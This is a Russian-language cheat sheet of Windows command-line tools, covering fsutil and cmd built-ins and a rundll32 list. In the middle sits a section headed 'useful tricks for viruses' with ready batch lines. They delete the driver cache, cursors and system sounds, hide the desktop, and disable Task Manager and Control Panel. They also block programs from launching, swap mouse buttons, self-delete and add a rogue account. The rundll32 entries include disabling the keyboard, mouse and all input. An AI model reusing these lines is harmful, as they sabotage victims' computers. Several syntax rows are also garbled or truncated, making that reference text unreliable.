В следующей таблице перечислены подкоманды команды fsutil
| behavior | Запрашивает, изменяет, включает или отключает настройки для создания имен файлов с длиной 8.3 символа, для возможности отображения расширенных символов в имена файлов длиной 8.3 символа в томах NTFS, для обновления штампа времени последнего доступа к томам NTFS, частоты событий, записанных в системных журнал, и количества места на диске, зарезервированного зоной основной таблицы файлов |
| dirty | Запрос установки «грязного» бита тома. Задает «грязный» бит тома. Когда установлен «грязный» бит тома, autochk автоматически проверит том на наличие ошибок при следующей перезагрузке компьютера |
| file | Обычно используется специалистами по технической поддержке. Поиск файла по идентификатору безопасности, запрос файла в размещенных диапазонах, установка короткого имени файла, допустимой длины данных или нулевых данных для файла |
| fsinfo | Обычно используется специалистами по технической поддержке. Перечисляет все диски, запрашивает тип диска, сведения о томе, специальные сведения о томе NTFS или статистику файловой системы |
| hardlink | Cоздает жесткую связь. Жесткая связь представляет запись каталога для файла. Каждый файл можно рассматривать как имеющий по крайней мере одну жесткую связь. В томах NTFS каждый файл имеет несколько жестких связей, следовательно один файл может отображаться во многих каталогах (или даже в одном каталоге под различными именами). Поскольку ссылки на все связи находятся в одном файле, программы могут открывать любую из связей и изменять файл. Файл удаляется из файловой системы только после удаления всех связей. После создания жесткой связи, программы могут использовать ее как любое другое имя файла |
| objectid | Обычно используется специалистами по технической поддержке. Управляет идентификаторами объектов, которые используются Windows XP для отслеживания объектов, таких как файлы и каталоги. Управляет дисковыми квотами в томах NTFS для предоставления более точного контроля за сетевым носителем. Дисковые квоты внедрены в тома и включают внедрение ограничений жестких и съемных носителей в тома |
| reparsepoint | Обычно используется специалистами по технической поддержке. Запрашивает или удаляет точки повторной обработки, являющиеся объектами файловой системы NTFS, которые имеют определяемый атрибут, содержащий контролируемые пользователем данные, и используются для расширения функциональности подсистемы ввода/вывода. Точки повторной обработки используют как точки соединения каталогов и точки подключения томов. Они также используются драйверами фильтров файловой системы, чтобы пометить определенные файлы как специфические для этого драйвера |
| sparse | Управление разреженными файлами. Разреженным файлом называют файл, внутри которого имеется одна или несколько областей, незанятые данными. Программа будет рассматривать эти незанятые области как содержащие байты с нулевыми значениями, но не будет использовать пространство на диске для представления этих нулей. Другими словами, место выделяется для значимых (ненулевых) данных, тогда как место под незначимые данные (длинные строки, состоящие из нулей) не выделяется. При чтении разреженного файла выделенные данные возвращаются в том виде, в котором они сохранены, а невыделенные данные по умолчанию возвращаются в виде нулей, согласно требованиям спецификации безопасности C2. Поддержка разреженного файла позаоляет освобождать данные из любого места в файле |
| usn | Обычно используется специалистами по технической поддержке. Управление журналом изменения номеров последовательных обновлений (USN), в котором сохраняется архив всех изменений файлов в томе |
| volume - Управление томом. Отсоединяет том или запросы для отображения количества свободного места на диске | |
| Eventquery.vbs | LIST| CSV}] [ /r диапазон_событий [ /nh] [ /v] [ /l [ APPLICATION] [ SYSTEM] [ SECURITY] [ "DNS server"] [ заданный_пользователем_журнал] [ имя_журнала_каталога] [ *] ] |
| Eventcreate | SYSTEM}]|[ /so имя_источника]} /t { ERROR| WARNING| INFORMATION| SUCCESSAUDIT| FAILUREAUDIT} /id код_события /d описание |
| Driverquery | LIST| CSV}] [ /nh] [ /v] [ /si], где /s компьютер - Задание имени или IP-адреса удаленного компьютера (не используйте обратную косую черту). По умолчанию используется локальный компьютер. /u домен пользователь - Выполнение команды с разрешениями учетной записи пользователя, заданного в параметре пользователь или домен пользователь. По умолчанию используются разрешения текущего вошедшего пользователя компьютера, с которого поступила эта команда. /p пароль - Указание пароля учетной записи пользователя, заданной параметром /u. /fo { TABLE| LIST| CSV} - Задание формата вывода сведений о драйверах. Допустимые значения: TABLE, LIST и CSV. По умолчанию для выходных данных используется формат TABLE. /nh - Исключение столбца заголовков из отображаемых сведений о драйверах. Данный параметр является допустимым, если параметр /fo имеет значение TABLE или CSV. /v - Задание вывода подробных сведений о драйверах. /si - Вывод сведений о цифровой подписи как для подписанных, так и неподписанных драйверов устройств. Примеры: Далее приведены примеры использования команды driverquery: driverquerydriverquery /fo csvdriverquery /nhdriverquery /s ipaddressdriverquery /s server1 /u hirpln /v driverquery /s server1 /u maindomhirpln /p p@ssw3d /fo list |
| Start | /shared}] [{ /low | /normal | /high | /realtime | /abovenormal | belownormal}] [/ wait] [ /b] [ имя_файла] [ параметры] |
| Shift | Изменяет положения пакетных параметров в пакетных файлах. Синтаксис: shift |
| Setlocal | disableextensions} { enabledelayedexpansion | disabledelayedexpansion} |
| Set | Устанавливает, удаляет и просматривает переменные среды. Вызванная без параметров, команда set выводит список установленных переменных среды и их значений. Синтаксис: set [[ /a [ выражение]] [ /p [ переменная =]] строка] |
| Pushd | Сохраняет имя текущего каталога для команды popd и переходит в другой каталог. Синтаксис: pushd [ путь] |
| Prompt | Изменяет приглашение командной строки (Cmd.exe). Вызванная без параметров, команда prompt восстанавливает стандартные настройки приглашения командной строки: имя текущего диска с последующим именем текущего каталога и знак "больше" (>). Синтаксис: prompt [ текст] |
| Popd | Изменяет текущий в каталог на каталог, сохраненный командой pushd. Синтаксис: popd |
| Mkdir | Создание папки или подпапки. Синтаксис: mkdir [ диск :] путь, md [ диск :] путь |
| If | Обработка условий в пакетных программах. Синтаксис: if [ not] errorlevel число команда [ else выражение], if [ not] строка1 == строка2 команда [ else выражение], if [ not] exist имя_файла команда [ else выражение]. Если расширения командного процессора разрешены, следует использовать следующий синтаксис: if [ /i] строка1 оп_сравнения строка2 команда [ else выражение], if cmdextversion число команда [ else выражение], if defined переменная команда [ else выражение], где not - Задает выполнение команды только в случае невыполнения условия. errorlevel число - Условие выполняется, если предыдущая команда, обработанная интерпретатором команд Cmd.exe, завершилась с кодом, равным или большим числа. команда - Команда, которая должна быть обработана в случае выполнения условия. строка1 == строка2 - Условие выполняется, если строки строка1 и строка2 совпадают. Строки могут быть заданы явно или могут быть пакетными переменными (например, %1). Явно заданные строки нет необходимости заключать в кавычки. exist имя_файла - Условие выполняется, если существует файл с именем имя_файла. оп_сравнения - Трехзначный оператор сравнения. В следующей таблице перечислены допустимые значения оп_сравнения Описание операторов: EQU - равноNEQ - не равноLSS - меньшеLEQ - меньше или равноGTR - большеGEQ - больше или равно |
| /i | Сравнение строк без учета регистра знаков. Параметр /i можно использовать в конструкции string1 == string2 команды if. Эти сравнения являются общими. Если и строка1, и строка2 состоят из цифр, строки преобразовываются в числа и выполняется сравнение чисел. cmdextversion число - Условие выполняется, только если номер внутренней версии, связанный с расширениями командного процессора Cmd.exe, равен или больше числа. первая версия имела номер 1. Номер версии увеличивается на 1 при внесении в расширения командного процессора значительных изменений. Условие с cmdextversion не выполняется, если расширения командного процессора запрещены (по умолчанию они разрешены). defined переменная - Условие выполняется, если переменная определена. выражение - Команда и все ее параметры для обработке в командной строке при выполнении оператора else. |
| Ftype | Вывод или редактирование связи между типом файла и его расширением. Для просмотра текущих назначений служит команда ftype без параметров. Синтаксис: Ftype [ тип_файла[ =[ команда_открытия]]]. |
| For | %% переменная} in ( множество ) do команда [ ПараметрыКоманднойСтроки]. |
| Endlocal | Окончание использования локального окружения в пакетной программе, восстановление значений переменных среды, имевшихся до выполнения соответствующей команды setlocal. Синтаксис: endlocal. |
| Del (erase) | Удаление заданных файлов. Синтаксис: del [ диск :] [ путь] имя_файла [ ...] [ /p] [ /f] [ /s] [ /q] [ /a[ : атрибуты]], erase [ диск :] [ путь] имя_файла [ ...] [ /p] [ /f] [ /s] [ /q] [ /a[ : атрибуты]]. |
Полезные фишки для вирусов.
| Удалить дрова | del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul |
| Убрать рабочий стол | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul |
| Самоликвидация | del "%0" >nul |
| Cнимаем системные атрибуты с некоторых файлов в указанной директории | attrib -s -r -h -a %systemdrive%*.* |
| Запрещает ТаскМена | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v DdisableTaskMgr /t REG_DWORD /d 1 /f >nul |
| Мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь | %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul |
| Запрет запуска программ | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul |
| Удаляет курсоры мыши | del "%SystemRoot%\Cursors\*.*" >nul |
| Удаляет звуки винды | del "%SystemRoot%\Media" /q >nul |
| Запретить панель управления | reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul |
| Cоздать новую учетную запись в данном случае будетназываться ламер | net user "ламер" /add >nul |
RUNDLL юзать прямо и тупо - пишете строку в BAT-файл и все:
| rundll32 shell32.dll,Control_RunDLL hotplug.dll | диалоговое окно Отключение или извлечение аппаратного устройства |
| rundll32 diskcopy,DiskCopyRunDll | вызов диалога "Копирование диска" |
| rundll32 keyboard,disable | отключение клавиатуры, действует до следующей перезагрузки. |
| rundll32 mouse,disable | отключение мыши вплоть до перезагрузки. |
| rundll32 krnl386.exe,exitkernel | выгрузить ядро системы, выход из Windows |
| rundll32 mshtml.dll,PrintHTML "HtmlFileNameAndPath" | распечатать документ HTML, где "HtmlFileNameAndPath" - путь к файлу и его имя |
| rundll32 мсprint2.dll,RUNDLL_PrintTestPage | распечатать тестовую страницу на принтере |
| rundll32 netplwiz.dll,AddNetPlaceRunDll | вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение" |
| rundll32 rnaui.dll,RnaWizard | вызов мастера "Удаленный доступ к сети" |
| rundll32 rnaui.dll,RnaWizard /1 | вызов мастера "Удаленный доступ к сети" без отображения начального окна |
| rundll32 shell,ShellExecute | открыть Проводник (папка "Рабочий стол") |
| rundll32 shell32,Control_RunDLL | открыть в Проводнике папку "Панель управления" |
| rundll32 shell32,Control_RunDLL appwiz.cpl,,n | вызов диалогового окна "Установка и удаление программ", в котором будет открыта вкладка с номером "n" (от 1 до 3) |
| rundll32 shell32,Control_RunDLL main.cpl @0 | открыть диалог "Свойства мыши" |
| rundll32 shell32,Control_RunDLL main.cpl @1 | открыть диалог "Свойства клавиатуры" |
| rundll32 shell32,Control_RunDLL main.cpl @2 | открыть папку "Принтеры" |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder | открыть папку "Принтеры" (другой способ) |
| rundll32 shell32,Control_RunDLL main.cpl @3 | открыть папку "Шрифты" |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder | открыть папку "Шрифты" (другой способ) |
| rundll32 SHELL32,Control_RunDLL modem.cpl, add | открыть диалог "Свойства модема" |
| rundll32 shell32,Control_RunDLL timedate.cpl | открыть диалог "Дата и время" |
| rundll32 shell32,OpenAs_RunDLL | вызвать диалог "Открыть с помощью..." |
| rundll32 shell32,ShellAboutA WINHOWTO.RU | информация о версии Windows |
| rundll32 shell32,SHExitWindowsEx 0 | закрыть все программы, перегрузить оболочку |
| rundll32 shell32, SHExitWindowsEx 1 | выключить ПК |
| rundll32 SHELL32, SHExitWindowsEx -1 | перегрузить оболочку Windows |
| rundll32 shell32, SHExitWindowsEx 2 | перегрузить ПК |
| rundll32 shell32,SHExitWindowsEx 4 | принудительно закрыть все программы. |
| rundll32 shell32,SHExitWindowsEx 8 | выход из Windows и выключение ATX-совместимого ПК |
| rundll32 shell32,SHFormatDrive | вызов диалога форматирования диска А: |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter | запуск "Мастера установки принтера" |
| rundll32 shell32,SHHelpShortcuts_RunDLL Connect | запуск мастера подключения сетевого диска |
| rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage | распечатать тестовую страницу |
| rundll32 sysdm.cpl,InstallDevice_Rundll | вызов мастера установки оборудования |
| rundll32 url.dll,FileProtocolHandler %1 | открыть веб-страницу, где %1 - URL сайта (включая [link=http://).]http://).[/link] |
| rundll32 url.dll,MailToProtocolHandler %1 | создать новое письмо, где %1 - e-mail адресата |
| rundll32 user,CASCADECHILDWINDOWS | расположить все окна каскадом |
| rundll32 user,TILECHILDWINDOWS | расположить все окна по экрану |
| rundll32 user,disableoemlayer | сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать |
| rundll32 user,ExitWindowsExec | быстрая перезагрузка Windows |
| rundll32 user,RepaintScreen | выполнить команду "Обновить" |
| rundll32 user,SetCaretBlinkTime n | задать частоту мигания курсора, соответствующую значению параметра n |
| rundll32 user,SetCursorPos | переместить курсор мыши в верхний левый угол экрана |
| rundll32 user,SetDoubleClickTime n | задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n |
| rundll32 user,SwapMouseButton | поменять местами клавиши мыши (обратная смена невозможна) |
| rundll32 user,WNetConnectDialog | вызов диалога "Подключение сетевого диска" |
| rundll32 user,WNetDisconnectDialog | вызов диалога "Отключение сетевого диска" |
| rundll32 AppWiz.Cpl,NewLinkHere %1 | запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу |
WSH(работает только в win2000):